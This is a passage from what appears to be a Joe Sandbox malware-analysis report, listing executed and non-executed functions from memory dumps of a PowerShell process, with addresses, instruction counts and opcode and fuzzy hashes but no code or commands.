              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 84a0c15677da39994f5ea41f0d1be9f55e68963c83b0c5cbae0b2ef186174875
              • Instruction ID: 0443308b59a9211e15b42119add9f7f9e4f1cfc668189561664e2b41374adc74
              • Opcode Fuzzy Hash: 84a0c15677da39994f5ea41f0d1be9f55e68963c83b0c5cbae0b2ef186174875
              • Instruction Fuzzy Hash: 4CD1F734A002199FDB18DF98D584A9EFBF2FF88310F258559E904AB3A5D731ED81CB94
              Function 04C09580 Relevance: .3, Instructions: 317COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 963d8d3fc7dea17044c646c640b7f1d40c6b31bf16a13a0f3415aa9cb9f8154a
              • Instruction ID: 490b98f4320d2cff494bc0fd0750b6a6841af39ee2601d80907cb57448f59626
              • Opcode Fuzzy Hash: 963d8d3fc7dea17044c646c640b7f1d40c6b31bf16a13a0f3415aa9cb9f8154a
              • Instruction Fuzzy Hash: 8CC19E71A002089FDB14DFA9D544AADBBF2FF85314F158569E406AF3A6CB34ED49CB80
              Function 04C0F1E4 Relevance: .3, Instructions: 279COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 363f0b52e998ada84230dad98fbfb19056ccdd2d48331e72558766def675b4e1
              • Instruction ID: 35e0d0f9f8929deeec0d677bbd3b19ef5ca76bef51966e81b2016724e5db62cd
              • Opcode Fuzzy Hash: 363f0b52e998ada84230dad98fbfb19056ccdd2d48331e72558766def675b4e1
              • Instruction Fuzzy Hash: 33B14E70E00219DFDF20CFA9D9857ADBBF2AF48314F14C52DD815A7294EBB4A985CB81
              Function 04C0FAB4 Relevance: .3, Instructions: 262COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b6876d87516da895981e586afaa2af2812e58f707ad04f5adeb1ea8f694afac
              • Instruction ID: 159974f91ae85c5d02f5cf4da5575ffa6bdf356c647671a04838d615ef995c88
              • Opcode Fuzzy Hash: 8b6876d87516da895981e586afaa2af2812e58f707ad04f5adeb1ea8f694afac
              • Instruction Fuzzy Hash: 14B15D70E00209CFDB20CFA9D89579DBBF2AF48314F14C52DD815A7294EBB4A985CF81
              Function 079D6060 Relevance: .2, Instructions: 247COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1222492edfde58d99c714c318b7408e6ad725bcad0902e555712baaba54af615
              • Instruction ID: 80c35375148e25698524003a37c729da194541e63138bdf6ace9b97c404f6ab1
              • Opcode Fuzzy Hash: 1222492edfde58d99c714c318b7408e6ad725bcad0902e555712baaba54af615
              • Instruction Fuzzy Hash: 5C91B2B0B002059FD714DB68CA45BAEBBB7AF89358F10C468E5046F795CB76EC418B91
              Function 079D605E Relevance: .2, Instructions: 217COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94a4b7df0c4cb5c8c6f5b96dee75603a2923f7922605891d0f3e69f1ae0b5fcd
              • Instruction ID: dd093ad4f14b8ecd29c197cc0fd78675f335c1720c1b590a1a40c01a46209471
              • Opcode Fuzzy Hash: 94a4b7df0c4cb5c8c6f5b96dee75603a2923f7922605891d0f3e69f1ae0b5fcd
              • Instruction Fuzzy Hash: 07819FB0A002059FDB14CB68CA45BAEBBB3AF89358F10C469E5046F791CB76EC41CB91
              Function 079D6043 Relevance: .2, Instructions: 217COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 97b52b87abe76b6b84e35b11a08e7626d15536bc95e90d8a65af910d5f2afd78
              • Instruction ID: 411a7c17f691ef14ed83f2e16a4d497688278f89917ce9825b676ab751926d90
              • Opcode Fuzzy Hash: 97b52b87abe76b6b84e35b11a08e7626d15536bc95e90d8a65af910d5f2afd78
              • Instruction Fuzzy Hash: 3A819EF0A002059FDB14CB64CA45BADBBB3AF89358F50C469E9046F791CB76ED41CB91
              Function 04C02B48 Relevance: .2, Instructions: 211COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2baa70fc868264e26a65fe2d48dbb4274bbbebf22dee65510f0d3c13b4c2200d
              • Instruction ID: c224c1dd311c79dd80a8069291cbde9fd00fab71bc7524c52ec908f28981a060
              • Opcode Fuzzy Hash: 2baa70fc868264e26a65fe2d48dbb4274bbbebf22dee65510f0d3c13b4c2200d
              • Instruction Fuzzy Hash: 9B917CB4A006458FCB05CF99C5989AEFBB2FF88310B248599D415AB3A5C735FD51CFA0
              Function 04C08DE8 Relevance: .2, Instructions: 204COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 256ebe7a627bccc717cbdcc9fc7b3e437d547976ea16c6618400fcbea1747dd9
              • Instruction ID: ab5cadf7c34ef6e3f9e0cc3defa0b6e1900510d01999e4d85a452ec6c09e6ff3
              • Opcode Fuzzy Hash: 256ebe7a627bccc717cbdcc9fc7b3e437d547976ea16c6618400fcbea1747dd9
              • Instruction Fuzzy Hash: 0E816B34A05244DFCB15DFB4C4849ADBBB3AF89314F19C4A9E405AB3A2CB35E985CB60
              Function 04C09EB6 Relevance: .2, Instructions: 188COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fdd44d663809adba6029e05cf0dcaeffa7b6867d162427dc75c3d7a3e5d3feac
              • Instruction ID: eace9b2c44d2db2684bce3aea0d17ff03417b0fea02bf1ac144862ae2ef99ca8
              • Opcode Fuzzy Hash: fdd44d663809adba6029e05cf0dcaeffa7b6867d162427dc75c3d7a3e5d3feac
              • Instruction Fuzzy Hash: 1D713D70A00208DFDF14DFB5D544BAEBBB2BF88308F148429D416AB2A1DB75AD86CB51
              Function 04C09D62 Relevance: .2, Instructions: 158COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ea96aa6daa4786c202332957152eb1ce5977202d22d03e1a94b62e33a001328c
              • Instruction ID: e1120473487e37a84078de8cd5a7505faf093ac9768ddacb9f0929b7bd898cbc
              • Opcode Fuzzy Hash: ea96aa6daa4786c202332957152eb1ce5977202d22d03e1a94b62e33a001328c
              • Instruction Fuzzy Hash: 2751B270900209CFCB14DFA4C580AAEBBB2FF84314F15C529D4159B6A1DB75BD46CF80
              Function 04C038E8 Relevance: .1, Instructions: 139COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d48f3bad5ae2c7588830afe34fd6ed4407d0148124b846889e2017533411aa9a
              • Instruction ID: 607ab90d46111f16a5fbdc71960a3601e4ee5031f6f158ec395880d3a2a5d1b5
              • Opcode Fuzzy Hash: d48f3bad5ae2c7588830afe34fd6ed4407d0148124b846889e2017533411aa9a
              • Instruction Fuzzy Hash: BE41CF2264E7E11FD703AA6C69710EA7F718E43164B0A41D3D4D0CF1E7D50A898DC3EA
              Function 04C09AD9 Relevance: .1, Instructions: 116COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5138ad3ec401c18aae6ffac5fac6e35668a1a1e8f2c36d54cec3a29a172cd752
              • Instruction ID: 072b089c0d43c9ceb6245dc31c524dcf8d95aac257ebdb6b2dbc9a6d7098d882
              • Opcode Fuzzy Hash: 5138ad3ec401c18aae6ffac5fac6e35668a1a1e8f2c36d54cec3a29a172cd752
              • Instruction Fuzzy Hash: C6415F71A002149FDB14DF24C558BAE7BF7EF89754F194069E402EB7A1CB38AD41CB60
              Function 04C02C58 Relevance: .1, Instructions: 105COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e0b910c95081bb6bd8e4e819d690d80c6f7cbb359e5cdb09b42cf2bca5c0ba5f
              • Instruction ID: c6d7a4f3fa6dcdd574976599da2bfec47b8df10cd7a12b63f9d1868a0a8b43f9
              • Opcode Fuzzy Hash: e0b910c95081bb6bd8e4e819d690d80c6f7cbb359e5cdb09b42cf2bca5c0ba5f
              • Instruction Fuzzy Hash: C24129B4A006058FCB09CF59C598EAAFBB2FF48310B158599D455AB3A4C736FD90CFA0
              Function 04C0C7B8 Relevance: .1, Instructions: 92COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4cd3ece0c91bf66e418332f0d87e63db85b6deb774c8d79bb897e6addbe9ae2e
              • Instruction ID: 5aa2bcd16b957e05f82f7f7345d56103573fd3883159f47a9f12fbf5a5ac0508
              • Opcode Fuzzy Hash: 4cd3ece0c91bf66e418332f0d87e63db85b6deb774c8d79bb897e6addbe9ae2e
              • Instruction Fuzzy Hash: A4313F30B011188FDB29DF64C8546EEB7B2AF49304F1585E9D50AAB351DF35AE81CF81
              Function 04C039C0 Relevance: .1, Instructions: 84COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 403193ff59abd95825311d19d6c151aa2673cba60e19e0b865e21d13ef8f4fbe
              • Instruction ID: 7f6db270e1002156c020f96e487c24a9d69eb5c4820518904255421c0e4edc66
              • Opcode Fuzzy Hash: 403193ff59abd95825311d19d6c151aa2673cba60e19e0b865e21d13ef8f4fbe
              • Instruction Fuzzy Hash: 3F319674A092958FCB02DF9CD9909EABFB1FF4A310B058096D844DB362C235ED44CBE5
              Function 04C039D0 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cc74d1ce51c0e9f74d0d7e69e9c59870221eccfa806de78c7c3945e2bc7c326b
              • Instruction ID: dbc2694a5d7e7412f159258221d827b2626af5f64815fa4b0bb4f15148585ef4
              • Opcode Fuzzy Hash: cc74d1ce51c0e9f74d0d7e69e9c59870221eccfa806de78c7c3945e2bc7c326b
              • Instruction Fuzzy Hash: 74211774A002498FCB04CF9DD5809AEBBB5FF89310B1484A9E919EB352C735FD41CBA0
              Function 04AED006 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969072315.0000000004AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AED000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4aed000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9e7825c20d5a4e9c6ea83702b596bf7c74b59abdb2aace587d16a27db134c448
              • Instruction ID: 8019b23de86d5eee24b47d4ed9f57199758c2010578ef144f8565b5adedffcb4
              • Opcode Fuzzy Hash: 9e7825c20d5a4e9c6ea83702b596bf7c74b59abdb2aace587d16a27db134c448
              • Instruction Fuzzy Hash: E001526100E3C05EE7124B25D994762BFB4DF53224F1DC1CBD8988F193C2699849C772
              Function 04AED01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969072315.0000000004AED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AED000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4aed000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 727954890f849d3bb19f2a71a3f412c884c76199c68595afd405395a2306fd7a
              • Instruction ID: de191b3e87f75731a70aa4c5659f53ac22fa1e8f861d14bbc42b6add98c42d0e
              • Opcode Fuzzy Hash: 727954890f849d3bb19f2a71a3f412c884c76199c68595afd405395a2306fd7a
              • Instruction Fuzzy Hash: E901F7311083019AF7104F26D984777BFE8DF41324F0CC52AEC2A0A146C279A841C6B1

              Non-executed Functions

              Function 04C0EEA8 Relevance: .2, Instructions: 238COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000009.00000002.2969374917.0000000004C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_4c00000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 450fe2f19a955a873cb8c498b4fd5cdaf8d6a6bf038f9494cc4ed34d665a451a
              • Instruction ID: cd276f72102e555544eecd979f59c40bcd42b618e446530d7048dc9de93b3b0e
              • Opcode Fuzzy Hash: 450fe2f19a955a873cb8c498b4fd5cdaf8d6a6bf038f9494cc4ed34d665a451a
              • Instruction Fuzzy Hash: D3916174E00209DFDF24CFA9C9817DDBBF2AF88318F14C529E415A7294EB74A985CB81
              Function 079D0BB0 Relevance: 17.9, Strings: 14, Instructions: 409COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$tP^q$tP^q
              • API String ID: 0-888303901
              • Opcode ID: 6ce8cc15d980fbb16a1b41bc295d0168c59761357e94901d3f147519b72fadf3
              • Instruction ID: 8c547cbc8c9b4c5a1ac6886d04f4f5e93ada76fb9999038a14ffd89d2c4752d3
              • Opcode Fuzzy Hash: 6ce8cc15d980fbb16a1b41bc295d0168c59761357e94901d3f147519b72fadf3
              • Instruction Fuzzy Hash: F7E1C0B1B40219DFCB28DF6CC544AAEBBA6BB88314F14C469E805AF355CB71DC85CB91
              Function 079D3658 Relevance: 12.8, Strings: 10, Instructions: 297COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-3512890053
              • Opcode ID: b673ffa866ae9ae7c4aab28b6f26c5339c779fc8b7ddd3c6a8c95c76b56431ca
              • Instruction ID: 962bed613e6d45f49f79324e2fcf79549d48c6303ef34df29a43ff9d8279b1fd
              • Opcode Fuzzy Hash: b673ffa866ae9ae7c4aab28b6f26c5339c779fc8b7ddd3c6a8c95c76b56431ca
              • Instruction Fuzzy Hash: FFA146F1B04206CFDB244A79880476A7BEAAF8265AF14C87AD445CB355DE72CD44C7A3
              Function 079D1D28 Relevance: 9.2, Strings: 7, Instructions: 481COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q
              • API String ID: 0-75002515
              • Opcode ID: 0d416f2b5d2c69316c615d4f2dba45628869a2070db6f36fe3230fa201102202
              • Instruction ID: a9f50c1f73993e68e7136d7fc9d5eac6534a0482d6cc26697ab5f2942e1aaa7a
              • Opcode Fuzzy Hash: 0d416f2b5d2c69316c615d4f2dba45628869a2070db6f36fe3230fa201102202
              • Instruction Fuzzy Hash: DFF136B6B042498FC7258B68D81066ABBB6EF86218F15C4BBD545CB252DB31CC45C7A1
              Function 079D1450 Relevance: 6.5, Strings: 5, Instructions: 288COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$tP^q$tP^q$tP^q
              • API String ID: 0-3457661241
              • Opcode ID: 864e7e532f75b68e1c0a94f4d1a676b38da541e84f748dfaf89607163d56276c
              • Instruction ID: 745551ced2392602df87b881f3e9bd7f67cbbf1341b0e5559880a0060c2b4303
              • Opcode Fuzzy Hash: 864e7e532f75b68e1c0a94f4d1a676b38da541e84f748dfaf89607163d56276c
              • Instruction Fuzzy Hash: AAA17DB6B843498FCB248B68D40476ABBFAAF86318F19C4ABD506CF351DA71CC44C791
              Function 079D2C7D Relevance: 6.4, Strings: 5, Instructions: 117COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$tP^q$$^q$$^q$$^q
              • API String ID: 0-3997570045
              • Opcode ID: 8a4f242f878502e2d58849009cd357638553756709e62d333bd7c91068f34f34
              • Instruction ID: de08941084c41f6ff85a553b6dbae92b57f5cc9e41628cdf04e9186f2b812f3e
              • Opcode Fuzzy Hash: 8a4f242f878502e2d58849009cd357638553756709e62d333bd7c91068f34f34
              • Instruction Fuzzy Hash: BF4125B2A04206EFDB258F14C454BA5B7F6BF49318F14C4AAE8159F291C771DC41CBA1
              Function 079D2C90 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$tP^q$$^q$$^q$$^q
              • API String ID: 0-3997570045
              • Opcode ID: 3c0e462692b569c619581441c0739fff64161c0f626011244bd0f018d07b3e3a
              • Instruction ID: 1a3c999a6534c41a4413aed102949ffb988ff3080bd2d19b25c9e6b179fc9aef
              • Opcode Fuzzy Hash: 3c0e462692b569c619581441c0739fff64161c0f626011244bd0f018d07b3e3a
              • Instruction Fuzzy Hash: 473118B2A00206EFDB388F14C454BA5B7F6BF49718F14C4A9E8156F294C771DD45CBA1
              Function 079D3820 Relevance: 6.3, Strings: 5, Instructions: 79COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$$^q$$^q$$^q$$^q
              • API String ID: 0-2825857601
              • Opcode ID: 7a1541f66a7751ccc953b356498be1deae653b4846bec2d51fb98821268f39c5
              • Instruction ID: 2e5c669c23a8c8fa5ad8579eb6cca819593aad74a91e20b984927522f2c34a7a
              • Opcode Fuzzy Hash: 7a1541f66a7751ccc953b356498be1deae653b4846bec2d51fb98821268f39c5
              • Instruction Fuzzy Hash: 902190F661420ADFDB384E05C544B7577AEBF41A5BF14C46AD8054B214C7B1CD84CA53
              Function 079D0148 Relevance: 5.3, Strings: 4, Instructions: 279COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$4'^q$4'^q
              • API String ID: 0-1420252700
              • Opcode ID: 9294ee5913eda443dc8980d0daf67094d7926ddfb0a6aa35e861d2ddebdbf679
              • Instruction ID: c0d4e6dc2059b59bb938b13cd669b6769fe4015eb1dd621a2d2042e7fd0de268
              • Opcode Fuzzy Hash: 9294ee5913eda443dc8980d0daf67094d7926ddfb0a6aa35e861d2ddebdbf679
              • Instruction Fuzzy Hash: 109133B1B0520A8FCB15CF6CD50466AFBB6AFC6218F24C4AAC505DF256EA71CC45C7A2
              Function 079D0B93 Relevance: 5.2, Strings: 4, Instructions: 238COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$tP^q$tP^q
              • API String ID: 0-3859475322
              • Opcode ID: dfea1fcd5f450355b624e4e273d7eb12d157fcb9baf33af9a57f2b8c448a8888
              • Instruction ID: 6f2a192d5ebe3e1b1ac4971f3a26bca833d7bc5cf529db6d79c4fa00a9a095b7
              • Opcode Fuzzy Hash: dfea1fcd5f450355b624e4e273d7eb12d157fcb9baf33af9a57f2b8c448a8888
              • Instruction Fuzzy Hash: 23919FB1E00219DFDB24CF58C544AA9BBB6BF49318F19C45AE915AF361C371EC81CB91
              Function 079D04E0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$tP^q$tP^q
              • API String ID: 0-3859475322
              • Opcode ID: 01963d39a7bbb23bb66d56cfb158280723b722718c5a6bb58c2ad6769ca40b69
              • Instruction ID: 4d614bda2e5203a5bef93d84a907038c4f42cd399a0f2ff299d3e1df9cd0e91a
              • Opcode Fuzzy Hash: 01963d39a7bbb23bb66d56cfb158280723b722718c5a6bb58c2ad6769ca40b69
              • Instruction Fuzzy Hash: D18126B0B402059FCB149F6DC804B7ABBE6AF85318F54C4AAE8059F391DB71DC45CBA1
              Function 079D23A8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: $^q$$^q$$^q$$^q
              • API String ID: 0-2125118731
              • Opcode ID: f30ee11be26e878d74305158209f7ac1c29d0dd885e296518bee9f3f4fde27b3
              • Instruction ID: 20f48f512673dae23f138bc82dedd1e3a9d0736d6729b17d24e223c62073f1fa
              • Opcode Fuzzy Hash: f30ee11be26e878d74305158209f7ac1c29d0dd885e296518bee9f3f4fde27b3
              • Instruction Fuzzy Hash: A12149B17143069BD7281B6A9D48B27BBDA7BC1719F24C83AA905CF385CDB5CC4082A1
              Function 079D12EB Relevance: 5.0, Strings: 4, Instructions: 45COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000009.00000002.2983209327.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_9_2_79d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: 4'^q$4'^q$$^q$$^q
              • API String ID: 0-2049395529
              • Opcode ID: d5be9909ae398b1c6395ef780f9c0597e24eaacb00e945c45e2129a8b8ff1a51
              • Instruction ID: 9a8ecc963c5ee5c964c39a6d1aab4bacd5471845d678287a4fe985ecf3f4adce
              • Opcode Fuzzy Hash: d5be9909ae398b1c6395ef780f9c0597e24eaacb00e945c45e2129a8b8ff1a51
              • Instruction Fuzzy Hash: 8F0126A2B8D3C98FC72A16281824159AFB21F9394071A44CBC061CF79BCE548C49C767